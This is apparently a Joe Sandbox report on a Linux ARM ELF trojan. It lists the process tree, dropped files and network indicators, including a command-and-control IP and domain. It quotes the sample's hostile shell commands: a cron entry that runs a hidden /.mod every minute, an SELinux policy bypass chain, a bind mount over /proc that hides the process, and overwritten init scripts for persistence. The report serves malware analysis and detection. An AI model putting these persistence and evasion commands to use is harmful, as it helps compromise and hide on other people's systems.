Edit tour

Linux Analysis Report
0S3wxWer8x.elf

Overview

General Information

Sample name:	0S3wxWer8x.elf renamed because original name is a hash value
Original sample name:	f88f1c803432b72243da85089264bc92.elf
Analysis ID:	1466266
MD5:	f88f1c803432b72243da85089264bc92
SHA1:	380f766eec0b181cb094b51e366487deabd0d312
SHA256:	1d37cf0bbe88047caf8442db890edad597a52a70fbab49ce258a51f9ea1b3163
Tags:	32armelf
Infos:

Detection

Score:	72
Range:	0 - 100
Whitelisted:	false

Signatures

Multi AV Scanner detection for submitted file

Drops files in suspicious directories

Sample tries to persist itself using /etc/profile

Sample tries to persist itself using System V runlevels

Sample tries to persist itself using cron

Sample tries to set files in /etc globally writable

Writes identical ELF files to multiple locations

Creates hidden files and/or directories

Creates hidden files without content (potentially used as a mutex)

Detected TCP or UDP traffic on non-standard ports

Executes commands using a shell command-line interpreter

Executes the "systemctl" command used for controlling the systemd system and service manager

Reads the 'hosts' file potentially containing internal network hosts

Sample has stripped symbol table

Sample tries to set the executable flag

Sleeps for long times indicative of sandbox evasion

Uses the "uname" system call to query kernel version information (possible evasion)

Writes ELF files to disk

Writes HTML files containing JavaScript to disk

Writes shell script file to disk with an unusual file extension

Writes shell script files to disk

Classification

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1466266
Start date and time:	2024-07-02 18:16:19 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 28s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample name:	0S3wxWer8x.elf renamed because original name is a hash value
Original Sample Name:	f88f1c803432b72243da85089264bc92.elf
Detection:	MAL
Classification:	mal72.spre.troj.evad.linELF@0/59@136/0

Warnings

VT rate limit hit for: 0S3wxWer8x.elf

Runtime Messages

Command:	/tmp/0S3wxWer8x.elf
PID:	5491
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:
Standard Error:

Process Tree

system is lnxubuntu20

0S3wxWer8x.elf (PID: 5491, Parent: 5414, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/0S3wxWer8x.elf

0S3wxWer8x.elf New Fork (PID: 5496, Parent: 5491)

0S3wxWer8x.elf (PID: 5496, Parent: 5491, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/0S3wxWer8x.elf

0S3wxWer8x.elf New Fork (PID: 5502, Parent: 5496)

bash (PID: 5502, Parent: 5496, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /bin/bash -c "cd /boot;systemctl daemon-reload;systemctl enable quotaon.service;systemctl start quotaon.service;journalctl -xe --no-pager"

bash New Fork (PID: 5506, Parent: 5502)

systemctl (PID: 5506, Parent: 5502, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload

bash New Fork (PID: 5512, Parent: 5502)

systemctl (PID: 5512, Parent: 5502, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable quotaon.service

bash New Fork (PID: 5516, Parent: 5502)

systemctl (PID: 5516, Parent: 5502, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start quotaon.service

bash New Fork (PID: 5517, Parent: 5502)

journalctl (PID: 5517, Parent: 5502, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: journalctl -xe --no-pager

0S3wxWer8x.elf New Fork (PID: 5518, Parent: 5496)

bash (PID: 5518, Parent: 5496, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /bin/bash -c "cd /boot;ausearch -c 'system.pub' --raw | audit2allow -M my-Systemmod;semodule -X 300 -i my-Systemmod.pp"

bash New Fork (PID: 5522, Parent: 5518)

bash New Fork (PID: 5523, Parent: 5518)

bash New Fork (PID: 5525, Parent: 5518)

0S3wxWer8x.elf New Fork (PID: 5528, Parent: 5496)

bash (PID: 5528, Parent: 5496, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /bin/bash -c "echo \"*/1 * * * * root /.mod \" >> /etc/crontab"

0S3wxWer8x.elf New Fork (PID: 5534, Parent: 5496)

update-rc.d (PID: 5534, Parent: 5496, MD5: 16a21f464119ea7fad1d3660de963637) Arguments: update-rc.d dns-udp4 defaults

update-rc.d New Fork (PID: 5539, Parent: 5534)

systemctl (PID: 5539, Parent: 5534, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload

0S3wxWer8x.elf New Fork (PID: 5543, Parent: 5496)

mount (PID: 5543, Parent: 5496, MD5: 92b20aa8b155ecd3ba9414aa477ef565) Arguments: mount -o bind /tmp/ /proc/5496

0S3wxWer8x.elf New Fork (PID: 5569, Parent: 5496)

service (PID: 5569, Parent: 5496, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: service cron start

service New Fork (PID: 5574, Parent: 5569)

basename (PID: 5574, Parent: 5569, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service

service New Fork (PID: 5575, Parent: 5569)

basename (PID: 5575, Parent: 5569, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service

service New Fork (PID: 5576, Parent: 5569)

systemctl (PID: 5576, Parent: 5569, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl --quiet is-active multi-user.target

service New Fork (PID: 5579, Parent: 5569)

service New Fork (PID: 5580, Parent: 5579)

systemctl (PID: 5580, Parent: 5579, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl list-unit-files --full --type=socket

service New Fork (PID: 5581, Parent: 5579)

sed (PID: 5581, Parent: 5579, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p

systemctl (PID: 5569, Parent: 5496, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start cron.service

0S3wxWer8x.elf New Fork (PID: 5604, Parent: 5496)

systemctl (PID: 5604, Parent: 5496, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start crond.service

systemd New Fork (PID: 5510, Parent: 5509)

snapd-env-generator (PID: 5510, Parent: 5509, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator

systemd New Fork (PID: 5514, Parent: 5513)

snapd-env-generator (PID: 5514, Parent: 5513, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator

systemd New Fork (PID: 5541, Parent: 5540)

snapd-env-generator (PID: 5541, Parent: 5540, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator

udisksd New Fork (PID: 5558, Parent: 803)

dumpe2fs (PID: 5558, Parent: 803, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

systemd New Fork (PID: 5594, Parent: 1)

cron (PID: 5594, Parent: 1, MD5: 2c82564ff5cc862c89392b061c7fbd59) Arguments: /usr/sbin/cron -f

cron New Fork (PID: 5656, Parent: 5594)

cron New Fork (PID: 5665, Parent: 5656)

sh (PID: 5665, Parent: 5656, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "/.mod "

sh New Fork (PID: 5666, Parent: 5665)

.mod (PID: 5666, Parent: 5665, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /.mod

.mod New Fork (PID: 5667, Parent: 5666)

libgdi.so.0.8.2 (PID: 5667, Parent: 5666, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /usr/lib/libgdi.so.0.8.2

libgdi.so.0.8.2 New Fork (PID: 5672, Parent: 5667)

libgdi.so.0.8.2 (PID: 5672, Parent: 5667, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /usr/lib/libgdi.so.0.8.2

systemd New Fork (PID: 5685, Parent: 1)

cron (PID: 5685, Parent: 1, MD5: 2c82564ff5cc862c89392b061c7fbd59) Arguments: /usr/sbin/cron -f

cleanup

Yara Signatures

⊘No yara matches

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: 0S3wxWer8x.elf

ReversingLabs: Detection: 21%

Source: global traffic

TCP traffic: 192.168.2.14:44524 -> 209.141.53.247:7788

Source: /tmp/0S3wxWer8x.elf (PID: 5496)

Reads hosts file: /etc/hosts

Jump to behavior

Source: global traffic

DNS traffic detected: DNS query: botbot.ddosvps.cc

Source: 0S3wxWer8x.elf, libgdi.so.0.8.2.14.dr, system.mark.14.dr, system.pub.14.dr, bash.cfg.14.dr	String found in binary or memory: http://.css
Source: 0S3wxWer8x.elf, libgdi.so.0.8.2.14.dr, system.mark.14.dr, system.pub.14.dr, bash.cfg.14.dr	String found in binary or memory: http://.jpg
Source: 0S3wxWer8x.elf, libgdi.so.0.8.2.14.dr, system.mark.14.dr, system.pub.14.dr, bash.cfg.14.dr	String found in binary or memory: http://html4/loose.dtd

Source: /tmp/0S3wxWer8x.elf (PID: 5496)	HTML file containing JavaScript created: /boot/system.pub	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	HTML file containing JavaScript created: /etc/profile.d/bash.cfg	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	HTML file containing JavaScript created: /usr/lib/libgdi.so.0.8.2	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	HTML file containing JavaScript created: /usr/lib/system.mark	Jump to dropped file

Source: ELF static info symbol of initial sample

.symtab present: no

Source: classification engine

Classification label: mal72.spre.troj.evad.linELF@0/59@136/0

Source: ELF file section	Submission: 0S3wxWer8x.elf
Source: ELF file section	Dropped file: system.pub.14.dr
Source: ELF file section	Dropped file: bash.cfg.14.dr
Source: ELF file section	Dropped file: libgdi.so.0.8.2.14.dr
Source: ELF file section	Dropped file: system.mark.14.dr

Persistence and Installation Behavior

Sample tries to persist itself using /etc/profile

Source: /tmp/0S3wxWer8x.elf (PID: 5496)	File: /etc/profile.d/bash.cfg	Jump to behavior
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	File: /etc/profile.d/bash.cfg.sh	Jump to behavior
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	File: /etc/profile.d/gateway.sh	Jump to behavior

Sample tries to persist itself using System V runlevels

Source: /usr/sbin/update-rc.d (PID: 5534)	File: /etc/rc2.d/S01dns-udp4 -> ../init.d/dns-udp4	Jump to behavior
Source: /usr/sbin/update-rc.d (PID: 5534)	File: /etc/rc3.d/S01dns-udp4 -> ../init.d/dns-udp4	Jump to behavior
Source: /usr/sbin/update-rc.d (PID: 5534)	File: /etc/rc4.d/S01dns-udp4 -> ../init.d/dns-udp4	Jump to behavior
Source: /usr/sbin/update-rc.d (PID: 5534)	File: /etc/rc5.d/S01dns-udp4 -> ../init.d/dns-udp4	Jump to behavior

Sample tries to persist itself using cron

Source: /bin/bash (PID: 5528)

File: /etc/crontab

Jump to behavior

Sample tries to set files in /etc globally writable

Source: /tmp/0S3wxWer8x.elf (PID: 5496)

File: /etc/profile.d/bash.cfg (bits: - usr: rx grp: rx all: rwx)

Jump to behavior

Writes identical ELF files to multiple locations

Source: /tmp/0S3wxWer8x.elf (PID: 5496)	File with SHA-256 1D37CF0BBE88047CAF8442DB890EDAD597A52A70FBAB49CE258A51F9EA1B3163 written: /boot/system.pub	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	File with SHA-256 1D37CF0BBE88047CAF8442DB890EDAD597A52A70FBAB49CE258A51F9EA1B3163 written: /usr/lib/system.mark	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	File with SHA-256 1D37CF0BBE88047CAF8442DB890EDAD597A52A70FBAB49CE258A51F9EA1B3163 written: /etc/profile.d/bash.cfg	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	File with SHA-256 1D37CF0BBE88047CAF8442DB890EDAD597A52A70FBAB49CE258A51F9EA1B3163 written: /usr/lib/libgdi.so.0.8.2	Jump to dropped file

Source: /tmp/0S3wxWer8x.elf (PID: 5496)	File: /etc/.ffff4444	Jump to behavior
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	File: /etc/.cfg	Jump to behavior
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	File: /etc/.cfg	Jump to behavior
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	File: /.mod	Jump to behavior
Source: /.mod (PID: 5666)	Directory: /.mod	Jump to behavior
Source: /usr/lib/libgdi.so.0.8.2 (PID: 5672)	File: /etc/.ffff4444	Jump to behavior
Source: /usr/lib/libgdi.so.0.8.2 (PID: 5672)	File: /etc/.cfg	Jump to behavior

Source: /usr/lib/libgdi.so.0.8.2 (PID: 5672)

Empty hidden file: /etc/.ffff4444

Jump to behavior

Source: /tmp/0S3wxWer8x.elf (PID: 5502)	Shell command executed: /bin/bash -c "cd /boot;systemctl daemon-reload;systemctl enable quotaon.service;systemctl start quotaon.service;journalctl -xe --no-pager"	Jump to behavior
Source: /tmp/0S3wxWer8x.elf (PID: 5518)	Shell command executed: /bin/bash -c "cd /boot;ausearch -c 'system.pub' --raw \| audit2allow -M my-Systemmod;semodule -X 300 -i my-Systemmod.pp"	Jump to behavior
Source: /tmp/0S3wxWer8x.elf (PID: 5528)	Shell command executed: /bin/bash -c "echo \"/1 * * * root /.mod \" >> /etc/crontab"	Jump to behavior
Source: /usr/sbin/cron (PID: 5665)	Shell command executed: /bin/sh -c "/.mod "	Jump to behavior

Source: /bin/bash (PID: 5506)	Systemctl executable: /usr/bin/systemctl -> systemctl daemon-reload	Jump to behavior
Source: /bin/bash (PID: 5512)	Systemctl executable: /usr/bin/systemctl -> systemctl enable quotaon.service	Jump to behavior
Source: /bin/bash (PID: 5516)	Systemctl executable: /usr/bin/systemctl -> systemctl start quotaon.service	Jump to behavior
Source: /usr/sbin/update-rc.d (PID: 5539)	Systemctl executable: /usr/bin/systemctl -> systemctl daemon-reload	Jump to behavior
Source: /usr/sbin/service (PID: 5569)	Systemctl executable: /usr/bin/systemctl -> systemctl start cron.service	Jump to behavior
Source: /usr/sbin/service (PID: 5576)	Systemctl executable: /usr/bin/systemctl -> systemctl --quiet is-active multi-user.target	Jump to behavior
Source: /usr/sbin/service (PID: 5580)	Systemctl executable: /usr/bin/systemctl -> systemctl list-unit-files --full --type=socket	Jump to behavior
Source: /tmp/0S3wxWer8x.elf (PID: 5604)	Systemctl executable: /usr/bin/systemctl -> systemctl start crond.service	Jump to behavior

Source: /tmp/0S3wxWer8x.elf (PID: 5496)	File: /boot/system.pub (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	File: /etc/profile.d/bash.cfg (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	File: /usr/lib/libgdi.so.0.8.2 (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	File: /usr/lib/system.mark (bits: - usr: rx grp: rx all: rwx)	Jump to behavior

Source: /tmp/0S3wxWer8x.elf (PID: 5496)	File written: /boot/system.pub	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	File written: /etc/profile.d/bash.cfg	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	File written: /usr/lib/libgdi.so.0.8.2	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	File written: /usr/lib/system.mark	Jump to dropped file

Source: /tmp/0S3wxWer8x.elf (PID: 5496)	Writes shell script file to disk with an unusual file extension: /.mod	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	Writes shell script file to disk with an unusual file extension: /etc/init.d/acpid	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	Writes shell script file to disk with an unusual file extension: /etc/init.d/alsa-utils	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	Writes shell script file to disk with an unusual file extension: /etc/init.d/anacron	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	Writes shell script file to disk with an unusual file extension: /etc/init.d/apparmor	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	Writes shell script file to disk with an unusual file extension: /etc/init.d/apport	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	Writes shell script file to disk with an unusual file extension: /etc/init.d/avahi-daemon	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	Writes shell script file to disk with an unusual file extension: /etc/init.d/binfmt-support	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	Writes shell script file to disk with an unusual file extension: /etc/init.d/bluetooth	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	Writes shell script file to disk with an unusual file extension: /etc/init.d/cron	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	Writes shell script file to disk with an unusual file extension: /etc/init.d/cryptdisks	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	Writes shell script file to disk with an unusual file extension: /etc/init.d/cryptdisks-early	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	Writes shell script file to disk with an unusual file extension: /etc/init.d/cups	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	Writes shell script file to disk with an unusual file extension: /etc/init.d/cups-browsed	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	Writes shell script file to disk with an unusual file extension: /etc/init.d/dbus	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	Writes shell script file to disk with an unusual file extension: /etc/init.d/gdm3	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	Writes shell script file to disk with an unusual file extension: /etc/init.d/hddtemp	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	Writes shell script file to disk with an unusual file extension: /etc/init.d/irqbalance	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	Writes shell script file to disk with an unusual file extension: /etc/init.d/iscsid	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	Writes shell script file to disk with an unusual file extension: /etc/init.d/kmod	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	Writes shell script file to disk with an unusual file extension: /etc/init.d/lightdm	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	Writes shell script file to disk with an unusual file extension: /etc/init.d/lm-sensors	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	Writes shell script file to disk with an unusual file extension: /etc/init.d/lvm2-lvmpolld	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	Writes shell script file to disk with an unusual file extension: /etc/init.d/mono-xsp4	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	Writes shell script file to disk with an unusual file extension: /etc/init.d/multipath-tools	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	Writes shell script file to disk with an unusual file extension: /etc/init.d/open-iscsi	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	Writes shell script file to disk with an unusual file extension: /etc/init.d/open-vm-tools	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	Writes shell script file to disk with an unusual file extension: /etc/init.d/plymouth	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	Writes shell script file to disk with an unusual file extension: /etc/init.d/plymouth-log	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	Writes shell script file to disk with an unusual file extension: /etc/init.d/procps	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	Writes shell script file to disk with an unusual file extension: /etc/init.d/rsync	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	Writes shell script file to disk with an unusual file extension: /etc/init.d/rsyslog	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	Writes shell script file to disk with an unusual file extension: /etc/init.d/saned	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	Writes shell script file to disk with an unusual file extension: /etc/init.d/screen-cleanup	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	Writes shell script file to disk with an unusual file extension: /etc/init.d/spice-vdagent	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	Writes shell script file to disk with an unusual file extension: /etc/init.d/ssh	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	Writes shell script file to disk with an unusual file extension: /etc/init.d/udev	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	Writes shell script file to disk with an unusual file extension: /etc/init.d/ufw	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	Writes shell script file to disk with an unusual file extension: /etc/init.d/unattended-upgrades	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	Writes shell script file to disk with an unusual file extension: /etc/init.d/uuidd	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	Writes shell script file to disk with an unusual file extension: /etc/init.d/x11-common	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	Writes shell script file to disk with an unusual file extension: /etc/init.d/dns-udp4	Jump to dropped file

Source: /tmp/0S3wxWer8x.elf (PID: 5496)	Shell script file created: /etc/profile.d/bash.cfg.sh	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	Shell script file created: /etc/init.d/console-setup.sh	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	Shell script file created: /etc/init.d/hwclock.sh	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	Shell script file created: /etc/init.d/keyboard-setup.sh	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	Shell script file created: /etc/profile.d/gateway.sh	Jump to dropped file

Source: /usr/sbin/service (PID: 5581)

Sed executable: /usr/bin/sed -> sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Drops files in suspicious directories

Source: /tmp/0S3wxWer8x.elf (PID: 5496)	File: /etc/init.d/acpid	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	File: /etc/init.d/alsa-utils	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	File: /etc/init.d/anacron	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	File: /etc/init.d/apparmor	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	File: /etc/init.d/apport	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	File: /etc/init.d/avahi-daemon	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	File: /etc/init.d/binfmt-support	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	File: /etc/init.d/bluetooth	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	File: /etc/init.d/console-setup.sh	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	File: /etc/init.d/cron	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	File: /etc/init.d/cryptdisks	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	File: /etc/init.d/cryptdisks-early	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	File: /etc/init.d/cups	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	File: /etc/init.d/cups-browsed	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	File: /etc/init.d/dbus	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	File: /etc/init.d/gdm3	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	File: /etc/init.d/hddtemp	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	File: /etc/init.d/hwclock.sh	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	File: /etc/init.d/irqbalance	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	File: /etc/init.d/iscsid	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	File: /etc/init.d/keyboard-setup.sh	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	File: /etc/init.d/kmod	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	File: /etc/init.d/lightdm	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	File: /etc/init.d/lm-sensors	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	File: /etc/init.d/lvm2-lvmpolld	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	File: /etc/init.d/mono-xsp4	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	File: /etc/init.d/multipath-tools	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	File: /etc/init.d/open-iscsi	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	File: /etc/init.d/open-vm-tools	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	File: /etc/init.d/plymouth	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	File: /etc/init.d/plymouth-log	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	File: /etc/init.d/procps	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	File: /etc/init.d/rsync	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	File: /etc/init.d/rsyslog	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	File: /etc/init.d/saned	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	File: /etc/init.d/screen-cleanup	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	File: /etc/init.d/spice-vdagent	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	File: /etc/init.d/ssh	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	File: /etc/init.d/udev	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	File: /etc/init.d/ufw	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	File: /etc/init.d/unattended-upgrades	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	File: /etc/init.d/uuidd	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	File: /etc/init.d/x11-common	Jump to dropped file
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	File: /etc/init.d/dns-udp4	Jump to dropped file

Source: /usr/sbin/cron (PID: 5594)

Sleeps longer then 60s: 60.0s

Jump to behavior

Source: /tmp/0S3wxWer8x.elf (PID: 5491)	Queries kernel information via 'uname':	Jump to behavior
Source: /tmp/0S3wxWer8x.elf (PID: 5496)	Queries kernel information via 'uname':	Jump to behavior
Source: /bin/bash (PID: 5502)	Queries kernel information via 'uname':	Jump to behavior
Source: /bin/bash (PID: 5518)	Queries kernel information via 'uname':	Jump to behavior
Source: /bin/bash (PID: 5528)	Queries kernel information via 'uname':	Jump to behavior
Source: /.mod (PID: 5666)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/lib/libgdi.so.0.8.2 (PID: 5667)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/lib/libgdi.so.0.8.2 (PID: 5672)	Queries kernel information via 'uname':	Jump to behavior

Source: open-vm-tools.14.dr	Binary or memory string: # Check if we're running inside VMWare
Source: open-vm-tools.14.dr	Binary or memory string: start-stop-daemon --start --quiet --pidfile /var/run/vmtoolsd.pid --exec /usr/bin/vmtoolsd --test > /dev/null \|\| exit 1
Source: open-vm-tools.14.dr	Binary or memory string: if ! ${checktool} \| grep -iq vmware; then
Source: open-vm-tools.14.dr	Binary or memory string: rm -f /var/run/vmtoolsd.pid
Source: libgdi.so.0.8.2, 5672.1.000055c5f61e3000.000055c5f6786000.rw-.sdmp	Binary or memory string: U!/etc/qemu-binfmt/arm
Source: libgdi.so.0.8.2, 5672.1.00007ffdb1e0d000.00007ffdb1e2e000.rw-.sdmp	Binary or memory string: Fx86_64/usr/bin/qemu-arm/usr/lib/libgdi.so.0.8.2
Source: 0S3wxWer8x.elf, 5491.1.0000557ea190a000.0000557ea1eae000.rw-.sdmp	Binary or memory string: ~Urg.qemu.gdb.arm.sys.regs">1/machine/unattached/device[1]
Source: 0S3wxWer8x.elf, 5491.1.00007ffcaa5b6000.00007ffcaa5d7000.rw-.sdmp	Binary or memory string: 9x86_64/usr/bin/qemu-arm/tmp/0S3wxWer8x.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/0S3wxWer8x.elf
